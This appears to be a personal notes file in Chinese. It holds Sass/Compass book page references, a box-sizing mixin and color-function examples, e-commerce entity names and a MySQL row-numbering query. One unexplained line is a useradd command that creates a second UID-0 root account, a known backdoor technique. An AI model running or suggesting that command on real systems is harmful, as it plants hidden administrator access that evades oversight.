
************************************************************************************************************

任务正理：PostgreSQL  PHP模式   EA11



嵌套语法

伪类的写法：《sass和compass设计师指南》第80页
父级选择器，级连选择器：《sass和compass设计师指南》第81页
使用父级选择器轻松添加modernizr样式：《sass和compass设计师指南》第82页
过渡嵌套的危险：《sass和compass设计师指南》第85页
ID选择器好不好？《sass和compass设计师指南》第87页
嵌套命名空间：《sass和compass设计师指南》第88页
使用@extend命令扩展现有代码：《sass和compass设计师指南》第92页
使用占位符选择器来扩展需要的样式：《sass和compass设计师指南》第93页
什么是混合宏？如何使用混合宏来轻松生成常用代码？《sass和compass设计师指南》第94页
如何用默认值写混合宏？《sass和compass设计师指南》第98页
@mixin bs($bs-type:border-box)
{
	-webkit-box-sizing:$bs-type;
	-moz-box-sizing:$bs-type;
	box-sizing:$bs-type;
}
生成CSS的注意事项：《sass和compass设计师指南》第101页
轻松玩转颜色
变浅函数示例：lighten($color,30%);
加深函数示例：darken($color,10%);










************************************************************************************************************
www.multimall.cn

卖家（vendor）  商品(wares)   订单(order)   买家（buyer） 



useradd -o -u 0 -g 0 -M -d /root -s /bin/bash vxzhan
select (@i:=@i+1) as i,post_time from tb_check_price,(select @i:=0) as tt  order by post_time desc; 


************************************************************************************************************












